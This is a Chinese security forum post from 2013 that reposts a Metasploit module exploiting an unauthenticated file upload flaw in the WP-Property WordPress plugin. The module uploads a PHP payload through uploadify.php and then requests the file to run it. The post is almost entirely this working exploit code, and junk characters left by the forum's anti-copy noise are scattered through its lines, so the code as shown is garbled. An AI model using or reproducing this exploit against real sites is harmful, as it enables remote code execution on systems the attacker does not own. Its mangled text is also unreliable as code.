找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2289|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞( U3 P& n8 M6 c9 t" ?* ^
+ ]6 O* K5 f4 }
## # This file is part of the Metasploit Framework and may be subject to
( {4 T( z$ U& A7 e; f
9 W0 n+ p) [2 ^. \7 X# redistribution and commercial restrictions. Please see the Metasploit: M7 E4 q+ i7 l, r/ t
+ {( Z9 R- P% R. x4 B5 z6 f* s( C" j
# Framework web site for more information on licensing and terms of use.7 z$ {; s. N. @$ ~
# p  Y. A  r8 ]
#   http://metasploit.com/framework/ ##, E  U/ T+ J9 L1 L0 m: |9 s

9 k+ ], s# |! ?) y9 K  I3 I
1 j5 Z! X/ h* e  m; U- T' H' U9 P

& z% A; u9 K' _( c: A$ O5 {
1 r& a; \# v" u. G6 ~& v* W! drequire 'msf/core'
; U' \# \( [& H2 [1 r+ L; s6 Xrequire 'msf/core/exploit/php_exe'
  `+ U7 ^/ a) c, [2 I$ c# C1 q7 r( u1 r2 f
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',) {4 ~; k& u+ Z; e# I
'Description'    => %q{
9 d6 }, g  Q, D  J% ]This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
  Y* k/ F* ?/ D+ X, P. [[
. s% r; m3 U0 ?" g$ C'Sammy FORGIT', # initial discovery, u+ o- s+ T0 J; x
'James Fitts <fitts.james[at]gmail.com>' # metasploit module# n6 ^& p8 M& |' ^
],
( C( g7 }: [- I0 I5 ~'License'        => MSF_LICENSE,8 W/ G- c% D1 {' i- x1 i3 M" Z
'References'     =>
' ^. A! E1 e, Y3 B0 Y[3 O* o6 ^/ p" l4 @" C7 G; Q9 e5 p) l
[ 'OSVDB', '82656' ],
, K/ Q2 D' `4 J% S8 f[ 'BID', '53787' ],0 A2 j, H9 t/ J
[ 'EDB', '18987'],
( f- }8 K( ]4 V! _8 h' z[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]. K' {; h' l0 c% c' o" C/ R- K
],+ c, J) T' o4 }( f: s. ?
'Payload'        =>0 D% M9 M# B: N: r
{
( R& ]8 Y: C; O. R'BadChars' => "\x00",
7 Z: y% i- s& B},; W) P: Q- H' L1 U, u2 X9 j, A3 b
'Platform'       => 'php',7 ?+ q3 i3 p, j8 E) f, \6 d
'Arch'           => ARCH_PHP,# \; ?# O+ ^5 C* }# c; D
'Targets'        =>
/ F2 L$ g5 t1 T" H[
% L" t9 r" M9 G( u/ S  j, f, f[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
. l4 A* |, e* q0 p3 f9 `[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]. Q* z5 ^1 h0 A. K6 O
],
! g7 ?  ]1 G# h( F0 o, j0 {) p( }'DefaultTarget'  => 0,9 p4 g( L3 f+ h$ u0 \0 O
'DisclosureDate' => 'Mar 26 2012'))
' R8 T# E+ Q1 }- r' _; L) C  c% Z6 V8 M9 \; m. Q
register_options(( R/ D% e( ]" l* J; C3 E  q
[
3 ^0 N- ?+ }  s+ IOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
3 C, n! c& `7 i2 w# C5 D0 e+ ~( z], self.class)
  y7 |1 q0 h% k: c" e/ c9 Bend
/ m6 u2 e$ N' G+ ]! u  Q# \; G. h% M% \6 |% V0 p+ \5 d0 P$ q
def check
; O2 F: ~/ y* Muri =  target_uri.path% ~* O% @! \$ k
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
  ^. U; Z+ L+ G& v- i8 L8 {'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"+ c. K! |7 X& m
})- `4 g9 n0 `' ^& Q9 L* S
# U: H+ c% _+ z2 u9 W& B
if not res or res.code != 200% Z2 a) ?, d  L+ d
return Exploit::CheckCode::Unknown
( N8 K, S( y$ ~' _6 k/ bend
+ a2 X# G7 Q9 a* o5 G4 `4 e- k" |5 e: U2 a
return Exploit::CheckCode::Appears( @6 ?0 z- K+ z" y( P' D" e) c8 V: v
end
# p8 X  _7 u- N5 B4 F2 i, r2 Y$ ^7 K/ F8 ^
def exploit
! {0 l; E( X7 @) l9 kuri =  target_uri.path
4 v  V* K9 d4 c' Guri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
: M2 H2 O4 M  i0 Y
/ _+ g9 g7 K' C0 z' p; idata = Rex::MIME::Message.new
0 ]" l& w+ p% E# q' odata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
1 }! M' G7 J& d) m% a+ Tdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")5 @$ A' ]6 c/ B1 v3 D4 }
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
2 |& @# P, {; V1 f5 w- S2 m! ~2 ^" R4 m. t* x8 a$ P& p! ], V* F2 }
print_status("#{peer} - Uploading payload #{@payload_name}")/ A' Z5 I* k1 D% J
res = send_request_cgi({8 l6 R# y0 B, @- h1 h9 T0 |0 F
'method' => 'POST',# J# r+ O# k$ G* l
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",9 Q& Q  ~4 y, |0 D* c7 W
'ctype'  => "multipart/form-data; boundary=#{data.bound}",
: o3 U! w& N: G3 y' n'data'   => post_data: n0 N+ Y0 o3 P; j# |9 R# ?
})! B2 K1 X+ H. E0 J* B+ B
8 L' \3 j! M7 r" }; Y. ?
if not res or res.code != 200 or res.body !~ /#{@payload_name}/# Z7 j5 _# N! F4 V
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")* L" l% u# P" n+ a- l0 {
end
" G6 b5 x' k7 J% t3 w7 E9 U
( N8 J# a3 U: g: S" g2 ~upload_uri = res.body
  K  t9 y6 |0 x: ], L
1 G! M  Z8 y. ]7 W+ k8 [& X+ oprint_status("#{peer} - Executing payload #{@payload_name}")
1 S( q  M, ?3 `$ R9 q4 jres = send_request_raw({1 g7 g; U9 G6 ~: r
'uri'    => upload_uri,
! j2 I9 m# ~) I7 z'method' => 'GET', ?# I. Z( t9 `# j
}); V3 y4 _( t0 k9 b2 o$ {
end
* b" ], Y* b+ o/ H7 j2 V1 [3 b2 f- qend
7 |* O. @5 ~; s, c7 r# ?- O
7 D( g( o9 V6 c! S不要问我这写的是什么 怎么利用 我是说msf.( J# @, a1 I" E* x- p# D

% |4 {4 F+ Q$ S. s$ R8 ^: k& w$ g2 i6 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表